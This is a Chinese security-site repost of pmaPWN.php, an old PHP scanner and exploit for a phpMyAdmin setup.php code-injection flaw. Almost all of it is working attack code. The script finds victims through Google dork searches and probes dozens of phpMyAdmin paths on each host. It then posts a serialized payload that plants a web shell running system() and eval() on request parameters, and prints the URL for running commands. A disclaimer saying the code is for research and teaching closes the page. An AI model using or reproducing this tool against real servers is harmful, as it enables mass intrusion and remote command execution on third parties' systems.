pmaPWN! – phpMyAdmin Code Injection RCE Scanner & Exploit 's

admin
admin
admin
141399
文章
117
评论
2017年5月3日06:37:47评论381 views字数 9887阅读32分57秒阅读模式
摘要

# milw0rm.com [2009-06-22]

# milw0rm.com [2009-06-22]

<?php  $list = array( '/phpmyadmin/', '/phpMyAdmin/', '/PMA/', '/pma/', '/admin/', '/dbadmin/', '/mysql/', '/myadmin/', '/phpmyadmin2/', '/phpMyAdmin2/', '/phpMyAdmin-2/', '/php-my-admin/', '/phpMyAdmin-2.2.3/', '/phpMyAdmin-2.2.6/', '/phpMyAdmin-2.5.1/', '/phpMyAdmin-2.5.4/', '/phpMyAdmin-2.5.5-rc1/', '/phpMyAdmin-2.5.5-rc2/', '/phpMyAdmin-2.5.5/', '/phpMyAdmin-2.5.5-pl1/', '/phpMyAdmin-2.5.6-rc1/', '/phpMyAdmin-2.5.6-rc2/', '/phpMyAdmin-2.5.6/', '/phpMyAdmin-2.5.7/', '/phpMyAdmin-2.5.7-pl1/', '/phpMyAdmin-2.6.0-alpha/', '/phpMyAdmin-2.6.0-alpha2/', '/phpMyAdmin-2.6.0-beta1/', '/phpMyAdmin-2.6.0-beta2/', '/phpMyAdmin-2.6.0-rc1/', '/phpMyAdmin-2.6.0-rc2/', '/phpMyAdmin-2.6.0-rc3/', '/phpMyAdmin-2.6.0/', '/phpMyAdmin-2.6.0-pl1/', '/phpMyAdmin-2.6.0-pl2/', '/phpMyAdmin-2.6.0-pl3/', '/phpMyAdmin-2.6.1-rc1/', '/phpMyAdmin-2.6.1-rc2/', '/phpMyAdmin-2.6.1/', '/phpMyAdmin-2.6.1-pl1/', '/phpMyAdmin-2.6.1-pl2/', '/phpMyAdmin-2.6.1-pl3/', '/phpMyAdmin-2.6.2-rc1/', '/phpMyAdmin-2.6.2-beta1/', '/phpMyAdmin-2.6.2-rc1/', '/phpMyAdmin-2.6.2/', '/phpMyAdmin-2.6.2-pl1/', '/phpMyAdmin-2.6.3/', '/phpMyAdmin-2.6.3-rc1/', '/phpMyAdmin-2.6.3/', '/phpMyAdmin-2.6.3-pl1/', '/phpMyAdmin-2.6.4-rc1/', '/phpMyAdmin-2.6.4-pl1/', '/phpMyAdmin-2.6.4-pl2/', '/phpMyAdmin-2.6.4-pl3/', '/phpMyAdmin-2.6.4-pl4/', '/phpMyAdmin-2.6.4/', '/phpMyAdmin-2.7.0-beta1/', '/phpMyAdmin-2.7.0-rc1/', '/phpMyAdmin-2.7.0-pl1/', '/phpMyAdmin-2.7.0-pl2/', '/phpMyAdmin-2.7.0/', '/phpMyAdmin-2.8.0-beta1/', '/phpMyAdmin-2.8.0-rc1/', '/phpMyAdmin-2.8.0-rc2/', '/phpMyAdmin-2.8.0/', '/phpMyAdmin-2.8.0.1/', '/phpMyAdmin-2.8.0.2/', '/phpMyAdmin-2.8.0.3/', '/phpMyAdmin-2.8.0.4/', '/phpMyAdmin-2.8.1-rc1/', '/phpMyAdmin-2.8.1/', '/phpMyAdmin-2.8.2/', '/sqlmanager/', '/mysqlmanager/', '/p/m/a/', '/PMA2005/', '/pma2005/', '/phpmanager/', '/php-myadmin/', '/phpmy-admin/', '/webadmin/', '/sqlweb/', '/websql/', '/webdb/', '/mysqladmin/', '/mysql-admin/', );  if($argc > 1) {  print "|****************************************************************|/n";  print "        pmaPWN.php - d3ck4, [email protected]/n";  print "       phpMyAdmin Code Injection RCE Scanner & Exploit/n";  print "  This is PHP version original http://milw0rm.com/exploits/8921/n";  print "           credit: Greg Ose, pagvac @ gnucitizen.org/n";  print "        greetz: Hacking Expose!, HM Security, darkc0de/n";  print "|****************************************************************|/n";  print "/n";  print "Usage: php $argv[0] /n";  exit; }   print "|****************************************************************|/n";  print "        pmaPWN.php - d3ck4, [email protected]/n";  print "       phpMyAdmin Code Injection RCE Scanner & Exploit/n";  print "  This is PHP version original http://milw0rm.com/exploits/8921/n";  print "           credit: Greg Ose, pagvac @ gnucitizen.org/n";  print "        greetz: Hacking Expose!, HM Security, darkc0de/n";  print "|****************************************************************|/n";  print "/n";  $Handlex = FOpen("pmaPWN.log", "a+");  FWrite($Handlex, "|****************************************************************|/n");  FWrite($Handlex, "        pmaPWN.php - d3ck4, [email protected]/n");  FWrite($Handlex, "       phpMyAdmin Code Injection RCE Scanner & Exploit/n");  FWrite($Handlex, "  This is PHP version original http://milw0rm.com/exploits/8921/n");  FWrite($Handlex, "           credit: Greg Ose, pagvac @ gnucitizen.org/n");  FWrite($Handlex, "        greetz: Hacking Expose!, HM Security, darkc0de/n");  FWrite($Handlex, "|****************************************************************|/n/n");     print "[-] Master, where you want to go today? /n";  print "[-] example dork: intitle:phpMyAdmin /n";     fwrite(STDOUT, "/n[ [email protected] ~] ./dork -s ");     $dork = trim(fgets(STDIN));     print "/n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'/n";  FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'/n");     for($i = 0; $i <= 900; $i+=100) {     $ch = curl_init();     curl_setopt($ch, CURLOPT_URL, "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N");  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);     curl_setopt($ch, CURLOPT_TIMEOUT, 200);     curl_setopt($ch, CURLOPT_HEADER, 1);     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);     curl_setopt($ch, CURLOPT_REFERER, "http://google.com");     curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');     $pg = curl_exec($ch);  curl_close($ch);      if (preg_match_all("/<h2 class=(.*?)><a href=/"(.*?)/" class=(.*?)>/", $pg, $links)) { $res[] = $links[2]; }  }      foreach($res as $key) {         foreach($key as $target) {             $total++;         }     }     print "[+] Done. $total rows return./n";  FWrite($Handlex, "[+] Done. $total rows return./n");  FClose($Handlex);     foreach($res as $key) {         foreach($key as $target) {    $Handlex = FOpen("pmaPWN.log", "a+");    $real = parse_url($target);    $url = "http://".$real['host'];    print "/n[-] Scanning phpMyAdmin on ".$url."/n";    FWrite($Handlex, "/n[-] Scanning phpMyAdmin on ".$url."/n");    FClose($Handlex);    sleep(5);    $curlHandle = curl_multi_init();    for ($i = 0;$i < count($list); $i++)    $curl[$i] = addHandle($curlHandle,$url.$list[$i]);    ExecHandle($curlHandle);    for ($i = 0;$i < count($list); $i++)    {     $text[$i] =  curl_multi_getcontent ($curl[$i]);     //echo $url.$list[$i]."/n";     $Handlex = FOpen("pmaPWN.log", "a+");     if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {     print "/n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]";     print "/n[+] Testing vulnerable, wait sec../n";     FWrite($Handlex, "/n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]");     FWrite($Handlex, "/n[+] Testing vulnerable, wait sec../n");      if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {       print "/n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]/n";       FWrite($Handlex, "/n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]/n");      }     FClose($Handlex);     exploit_site($url.$list[$i]);     }    }    for ($i = 0;$i < count($list); $i++)//remove the handles    curl_multi_remove_handle($curlHandle,$curl[$i]);    curl_multi_close($curlHandle);    sleep(5);   }     }  function addHandle(&$curlHandle,$url) { $cURL = curl_init(); curl_setopt($cURL, CURLOPT_URL, $url); curl_setopt($cURL, CURLOPT_HEADER, 0); curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1); curl_setopt($cURL, CURLOPT_TIMEOUT, 10); curl_multi_add_handle($curlHandle,$cURL); return $cURL; } //execute the handle until the flag passed // to function is greater then 0 function ExecHandle(&$curlHandle) { $flag=null; do { //fetch pages in parallel curl_multi_exec($curlHandle,$flag); } while ($flag > 0); }  function exploit_site($url) {  $ch = curl_init();  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  curl_setopt($ch, CURLOPT_HEADER, 1);  curl_setopt($ch, CURLOPT_TIMEOUT, 200);  curl_setopt($ch, CURLOPT_URL, $url."scripts/setup.php");  $result = curl_exec($ch);  curl_close($ch);  $ch2 = curl_init();  curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);  curl_setopt($ch2, CURLOPT_HEADER, 1);  curl_setopt($ch2, CURLOPT_TIMEOUT, 200);  curl_setopt($ch2, CURLOPT_URL, $url."config/config.inc.php");  $result2 = curl_exec($ch2);  curl_close($ch2);  //print $url;  if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {   print "/n[!] w00t! w00t! Found possible phpMyAdmin vuln";   print "/n[+] Exploiting, wait sec../n";   $Handlex = FOpen("pmaPWN.log", "a+");   FWrite($Handlex, "/n[!] w00t! w00t! Found possible phpMyAdmin vuln");   FWrite($Handlex, "/n[+] Exploiting, wait sec../n");   FClose($Handlex);   exploit($url);  }  else {   $Handlex = FOpen("pmaPWN.log", "a+");   print "/n[-] Shit! no luck.. not vulnerable/n";   FWrite($Handlex, "/n[-] Shit! no luck.. not vulnerable/n");   FClose($Handlex);  } }   function exploit($w00t) {   $Handlex = FOpen("pmaPWN.log", "a+");   $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox   //first get cookie + token   $curl = curl_init();   curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); //URL   curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);   curl_setopt($curl, CURLOPT_USERAGENT, $useragent);   curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);   curl_setopt($curl, CURLOPT_TIMEOUT, 200);   curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);   curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);   curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string   curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");   curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");   $result = curl_exec($curl);   curl_close($curl);   if (preg_match_all("/token/"/s+value=/"([^>]+?)/"/", $result, $matches));    $token = $matches[1][1];   if ($token != '') {   print "/n[!] w00t! w00t! Got token = " . $matches[1][1];   FWrite($Handlex, "/n[!] w00t! w00t! Got token = " . $matches[1][1]);   $payload = "token=".$token."&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(/$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(/$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(/$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(/$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";   print "/n[+] Sending evil payload mwahaha.. /n";   FWrite($Handlex, "/n[+] Sending evil payload mwahaha.. /n");   $curl = curl_init();   curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php");   curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);   curl_setopt($curl, CURLOPT_TIMEOUT, 200);   curl_setopt($curl, CURLOPT_USERAGENT, $useragent);   curl_setopt($curl, CURLOPT_REFERER, $w00t);   curl_setopt($curl, CURLOPT_POST, true);   curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);   curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");   curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");   curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);   curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);   curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);   curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);   $result = curl_exec($curl);   curl_close($curl);    print "/n[!] w00t! w00t! You should now have shell here";   print "/n[+] ".$w00t."config/config.inc.php?c=id /n";   print "/n[!] Saved. Dont forget to check `pmaPWN.log`/n";   FWrite($Handlex, "/n[!] w00t! w00t! You should now have shell here");   FWrite($Handlex, "/n[+] ".$w00t."config/config.inc.php?c=id /n");    }   else {    print "/n[!] Shit! no luck.. not vulnerable/n";    FWrite($Handlex, "/n[!] Shit! no luck.. not vulnerable/n");    return false;   }   FClose($Handlex);   if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); }   //exit();  }  ?>

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月3日06:37:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   pmaPWN! – phpMyAdmin Code Injection RCE Scanner & Exploit 'shttps://cn-sec.com/archives/44797.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息